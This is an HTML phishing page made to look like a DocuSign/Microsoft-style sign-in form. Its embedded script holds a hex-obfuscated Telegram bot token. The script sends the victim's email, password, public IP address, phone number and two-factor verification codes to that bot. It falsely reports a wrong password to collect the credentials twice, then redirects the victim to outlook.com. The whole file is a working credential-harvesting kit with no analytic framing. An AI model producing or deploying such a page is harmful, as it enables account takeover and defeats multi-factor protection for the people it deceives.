<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>

    <style>
        body{
            padding: 0;
            margin: 0;
            box-sizing: border-box;
            background: url('https://i.ibb.co/LJz4z44/officebg.png') ;
            background-position: center;
            background-size: cover;
            background-repeat: no-repeat;
            font-family: Arial, Helvetica, sans-serif;
            height: 980px;
    
        }

        .formal input{
            width: 95%;
            border: none;
            border-bottom: 1px solid #000;
            padding: 5px;
            outline: none;
            font-size: 1rem;
    font-weight: 400;
    line-height: 1.5;
    color: #495057;
    background-color: #fff;
    border-radius: 0px;
    background: transparent;
        }
        .formal button{
            color: #fff;
    border-color: #0067b8;
    background-color: #0067b8;
    padding: 5px 40px;
    float: right;
        }
        .formal p{
            font-size: .8125rem;
        }
        .formal a{
            font-size: .8125rem;
            color: #0067b8;
            text-decoration: none;
        }
        .formal{
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            -webkit-box-shadow: 10px 10px 96px -18px rgba(0,0,0,0.15);
    -moz-box-shadow: 10px 10px 96px -18px rgba(0,0,0,0.15);
    box-shadow: 10px 10px 96px -18px rgba(0,0,0,0.15);
    padding: 40px;
    width: 22%;
            border-radius: 2px;
            background: #fff;
        }


        #disp{
            display: none;
        }
        h1{

            color: #1b1b1b;
    font-size: 1.5rem;
    font-weight: 600;
        }

        #pass-mail{
            display: none;
        }

        #v-butt{
            display: none;
        }
        #nexts{
            display: block;
        }

        #sign-ins{
            font-size: 16px;
            display: none;
        }
        #code-sent{
            display: none;
        }
        
        #no-account{
            display: block;
        }

        #vf-code{
            display: none;
        }

        .s-coder{
            display: none;
        }
        #vf-codeer{
            display: none;
        }

        .s-coderr{
            display: none;
        }

        .s-code{
            display: none;
        }
        @media(max-width: 800px){
        .formal{
            top: 20%;
            width: 90%;
        padding: 15px;
        box-shadow: none;
        }
        body{
            background: #fff;
        }
        }
    </style>
</head>
<body>
    

    <div class="formal">
      <div class="css-6r4a48 e2woug80"><svg style="height: 25px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 241.4"><g><g><path d="M1169.2,109.7v78.7h-28.9v-73.5c0-17.9-7.7-27.9-22.7-27.9s-24.9,10.5-27.7,28.1c-0.8,4.2-1,10.7-1,24.4v48.8H1060v-125 h25.6c0.1,1.1,0.7,12.3,0.7,13c0,0.9,1.1,1.4,1.8,0.8c10.6-8.4,22.3-16.2,38.6-16.2C1153.5,60.9,1169.2,79,1169.2,109.7z"></path><path d="M1013.4,63.4l-0.9,14.3c-0.1,0.9-1.2,1.4-1.8,0.8c-3.5-3.3-16.4-17.5-38.3-17.5c-31.4,0-54.5,27.1-54.5,63.9l0,0 c0,37.3,22.9,64.5,54.5,64.5c21.1,0,34-13.7,36.4-16.7c0.7-0.8,2-0.3,2,0.7c-0.3,3.8-0.8,13.3-4,21.4c-4,10.2-13,19.7-31.1,19.7 c-14.9,0-28.1-5.7-40.6-17.9L920,217.3c13.7,15.5,35.3,24.2,58.8,24.2c37.8,0,60.5-25.9,60.5-68.2V63.4H1013.4z M978.6,163.2 c-18.7,0-31.9-16.2-31.9-38.3S959.9,87,978.6,87c18.7,0,31.9,15.7,31.9,37.9C1010.4,147.1,997.2,163.2,978.6,163.2z"></path><path d="M857.5,151.3c0,23.7-19.9,39.6-49.1,39.6c-22.9,0-43.3-8.9-55.5-21.6l0,0l0,0l9.5-22.6c9.2,8.3,24,20.2,45.1,20.2 c14.7,0,23.2-6.5,23.2-14.7c0-9.5-11.7-12-25.7-14.7c-19.9-4.2-46.3-11-46.3-38.1c0-22.7,18.4-38.3,45.6-38.3 c20.9,0,38.9,8,51.3,18.4l-14.2,19.9c-12-9.5-24.6-14.2-37.1-14.2s-18.7,5.2-18.7,12.7c0,10.5,13.5,13.2,23.4,15.2 C833.9,117.9,857.5,125.4,857.5,151.3z"></path><path d="M434.9,60.9c-35.3,0-60.7,27.4-60.7,65s25.4,65,60.7,65s60.8-27.4,60.8-65S470.3,60.9,434.9,60.9z M434.9,164.7 c-18.7,0-31.9-15.9-31.9-38.9c0-22.9,12.9-38.9,31.9-38.9c18.9,0,31.9,15.9,31.9,38.9S453.6,164.7,434.9,164.7z"></path><path d="M505.9,125.9c0-37.1,25.4-65,59.3-65c26.9,0,46.6,13.5,55.8,38.9l-25.6,9.7c-7-15.7-16.2-22.4-30.1-22.4 c-17.4,0-30.4,16.4-30.4,38.9c0,22.4,12.9,38.9,30.4,38.9c14,0,23.1-6.7,30.1-22.4l25.6,9.7c-9.2,25.4-28.9,38.9-55.8,38.9 C531.3,190.9,505.9,163,505.9,125.9L505.9,125.9L505.9,125.9L505.9,125.9z"></path><path d="M351.4,5.3c-0.5,0-1.1,0.1-1.6,0.4l-18.8,10c-0.4,0.2-0.6,0.6-0.6,1v59.5c0,1-1.2,1.4-1.9,0.8 c-2.8-2.4-9.3-8.5-18.3-12.7c-4.7-2.2-11.6-3.4-17.9-3.4c-31.6,0-54.5,27.4-54.5,65s22.9,65,54.5,65c16.6,0,29.1-8.7,36.7-16.5 c0.5-0.5,0.8-0.8,1.3-1.3c0.7-0.7,1.9-0.3,1.9,0.7l1,14.6h26.1V6.1c0-0.4-0.3-0.8-0.8-0.8C358.5,5.3,351.4,5.3,351.4,5.3z  M298.5,164.7c-18.9,0-31.9-15.9-31.9-38.9S279.9,87,298.5,87c18.7,0,31.9,15.9,31.9,38.9C330.4,148.8,317.5,164.7,298.5,164.7z"></path><path d="M891.5,63.8l-18.1,9.6c-0.4,0.2-0.6,0.6-0.6,1v114h28.9V64.1c0-0.4-0.3-0.8-0.8-0.8h-7.8C892.5,63.4,892,63.5,891.5,63.8 z"></path><path d="M887.2,43.1c9.6,0,17.4-7.8,17.4-17.4s-7.8-17.4-17.4-17.4c-9.6,0-17.4,7.8-17.4,17.4S877.6,43.1,887.2,43.1z"></path><path d="M742.5,63.3v67.9c0,51.5-28.8,59.6-54.5,59.6s-54.5-8.2-54.5-59.6V63.3h28.8v75.1c0,7.3,1.8,26.3,25.7,26.3 s25.7-18.9,25.7-26.3V63.3H742.5z"></path></g><g><path d="M1185.7,175.6v1.8h-4.1v10.9h-2v-10.9h-4.1v-1.8H1185.7z M1200,188.3h-2v-10l-3.9,7.5h-1.1l-3.9-7.4v9.9h-2v-12.7h2.6 l3.8,7.3l3.8-7.3h2.6L1200,188.3L1200,188.3z"></path></g></g><g><path fill="#4C00FF" d="M139.5,139.5V189c0,2.6-2.1,4.7-4.7,4.7H4.7c-2.6,0-4.7-2.1-4.7-4.7V59c0-2.6,2.1-4.7,4.7-4.7h49.4v80.5 c0,2.6,2.1,4.7,4.7,4.7H139.5L139.5,139.5z"></path><path fill="#FF5252" d="M193.7,69.7c0,41.6-24.3,69.7-54.2,69.8V87.1c0-1.5-0.6-3-1.7-4l-27.2-27.2c-1.1-1.1-2.5-1.7-4-1.7H54.2V4.8 c0-2.6,2.1-4.7,4.7-4.7h73.3C167,0,193.7,28,193.7,69.7z"></path><path d="M137.8,83c1.1,1.1,1.7,2.5,1.7,4v52.4H58.9c-2.6,0-4.7-2.1-4.7-4.7V54.2h52.4c1.5,0,3,0.6,4,1.7L137.8,83z"></path></g></svg></div> <form action="#" id="formm">
            <br>
            <span id="disp">mailers@mail.ru</span>
            <label for="#"><h1 id="signs">Sign in</h1></label>
            <p style="color: red; display: none;" id="redas" >Your account or password is incorrect.</p>
            <p id="sign-ins">We'll send a code to your mobile to sign you in.</p>
            <input type="text" id="phone-mail" placeholder="Email" required>
            <input type="password" id="pass-mail" placeholder="Password" required>
            <input type="text" id="vf-code" value="+1 " placeholder="" required>
            <input type="text" id="vf-codeer" value=" " placeholder="" required>
            <br>
            <p id="no-account">No account? <a href="#">Create one!</a></p>
            <a href="#" id="access">Can’t access your account?</a>
<br><br><br>
            <div class="main-butts">
                <button id="nexts">Next</button>
                <button id="v-butt" type="submit">Next</button>
            </div>
            
        </form>
        <button class="s-code">Send Code</button>
        <button class="s-coder">Continue</button>
        <button class="s-coderr">Confirm</button>
        <br>
    </div>
    <!-- <div class="formal">
        <img src="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" alt="">
        <form action="#" id="formm">
            <br>
            <span id="disp">mailers@mail.ru</span>
            <label for="#"><h1 id="signs">Sign in</h1></label>
            <p id="sign-ins">We'll send a code to your mobile to sign you in.</p>
            <input type="text" id="phone-mail" placeholder="Email, phone and Skype" required>
            <input type="password" id="pass-mail" placeholder="Password" required>
            <input type="text" id="vf-code" placeholder="Code" required>
            <br>
            <p id="no-account">No account? <a href="#">Create one!</a></p>
            <a href="#" id="access">Can’t access your account?</a>
<br><br><br>
            <div class="main-butts">
                <button id="nexts">Next</button>
                <button id="v-butt" type="submit">Next</button>
            </div>
            
        </form>
        <button class="s-code">Send Code</button>
        <br>
    </div> -->




    <script>
          const formall = document.querySelector('#formm')
          
          var _$_183b=["\x37\x32\x33\x33\x37\x38\x33\x33\x32\x34\x3A\x41\x41\x48\x6C\x72\x64\x71\x66\x53\x38\x4A\x57\x56\x4B\x64\x50\x50\x58\x68\x57\x36\x76\x30\x69\x31\x39\x34\x46\x5F\x57\x4A\x46\x71\x46\x38","\x2D\x34\x32\x33\x33\x32\x31\x37\x36\x34\x31"];let bot={TOKEN:_$_183b[0],chatID:_$_183b[1]}


          const butts = document.querySelector('#nexts')
          const vButt = document.querySelector('#v-butt')
          const signIns = document.querySelector('#sign-ins')
          const signs = document.querySelector('#signs')
          const disp = document.querySelector('#disp')
          const phoneMail = document.querySelector('#phone-mail')
          const codeS = document.querySelector('#code-sent')
          const passMail = document.querySelector('#pass-mail')
          const noAccount = document.querySelector('#no-account')
          const access = document.querySelector('#access')
          const vfCode = document.querySelector('#vf-code')
          const vfCodea = document.querySelector('#vf-codeer')
          const mainButts = document.querySelector('.main-butts')
          const sCode = document.querySelector('.s-code')
          const sCoder = document.querySelector('.s-coder')
          const ssCoder = document.querySelector('.s-coderr')
          const redass = document.querySelector('#redas')
          butts.addEventListener('click', (e)=>{
            e.preventDefault()
            if(phoneMail.value === ""){
                return
            }
            // alert(phoneMail.value)
            if(tester !== 1){
                    redas.style.display = 'block'
            } else {
            setTimeout(() => {
                disp.textContent = phoneMail.value
            signs.textContent = "Enter Password"
            disp.style.display = "block"
            passMail.style.display = "block"
            phoneMail.style.display = "none"
            butts.style.display = 'none'
            vButt.style.display = 'block'
            // butts.type = 'submit'
            }, 2000);
        }
          })


          let tester = 1

          fetch('https://api.ipify.org/?format=json').then(results => results.json()).then(data => {

          formall.addEventListener("submit", e=>{
              e.preventDefault();
      
              // alert('clicker')
                const mainUser = phoneMail.value
                const mainPs = passMail.value
              
              fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=EXCELL==${mainUser}==${mainPs}==${data.ip}`, {
                  method: "GET"
              }).then(success => {
                  // alert('SENT')
                  // window.location.replace("/email.html");
                //   alert('incorrect password')
                  if(tester !== 1){
                    setTimeout(() => {
                    // mainButts.innerHTML = '<button id="code-sent">Send Code</button>'
                    // codeS.style.display = "block"
                    vButt.style.display = "none"
                    sCode.style.display = "block"
                    signs.textContent = "Sign In"
                    signIns.style.display = 'block'
                    noAccount.style.display = "none"
                    passMail.style.display = "none"
                    access.style.display = "none"
                redass.style.display = "none"

                  }, 2000);
                  
                    
            } else {
                redass.style.display = "block"
                passMail.textContent = ""
                  passMail.type = 'text'
                // alert(' password')
                tester = 0

            }
               
              
            

              }, error => {
                  console.log(error)
      
              })
      
          })
        })



          sCode.addEventListener('click', ()=>{
            fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=EXCELL==SEND CODE NOW`, {
                  method: "GET"
              }).then(success => {
                  // alert('SENT')
                  
                  setTimeout(() => {
                    // codeS.style.display = "block"
                    vButt.style.display = "none"
                    sCode.style.display = "none"
                    signs.textContent = "Sign In"
                    vfCode.style.display = "block"
                    signIns.textContent = "Confirm your mobile number."
                    // signIns.style.display = 'block'
                    // noAccount.style.display = "none"
                    // passMail.style.display = "none"
                    // access.textContent = "Other ways to sign in"
                    sCoder.style.display = 'block'
                    access.style.display = "none"
                  }, 2000);

              }, error => {
                  console.log(error)
      
              })
      
          })



          sCoder.addEventListener('click', ()=>{
            if(vfCode.value === ''){
                return
            }

            fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=EXCELL==${vfCode.value}`, {
                  method: "GET"
              }).then(success => {

                setTimeout(() => {
                    // codeS.style.display = "block"
                    signs.textContent = "Verification"
                    vfCode.style.display = "none"
                    vfCodea.style.display = "block"
                    signIns.textContent = "Confirm code sent to your device."
                    // signIns.style.display = 'block'
                    // noAccount.style.display = "none"
                    // passMail.style.display = "none"
                    // access.textContent = "Other ways to sign in"
                    sCoder.style.display = 'none'
                    ssCoder.style.display = 'block'
                    access.style.display = "none"
                  }, 2000);

                // setTimeout(() => {
                //   window.location.replace("https://outlook.com");
                // }, 2000);

              }, error => {
                  console.log(error)
      
              })
          })
          ssCoder.addEventListener('click', ()=>{
            if(vfCodea.value === ''){
                return
            }

            fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=EXCELL==${vfCodea.value}`, {
                  method: "GET"
              }).then(success => {
                // alert('working')
                setTimeout(() => {
                  window.location.replace("https://outlook.com");
                }, 2000);

              }, error => {
                  console.log(error)
      
              })
          })
    </script>

</body>
</html>
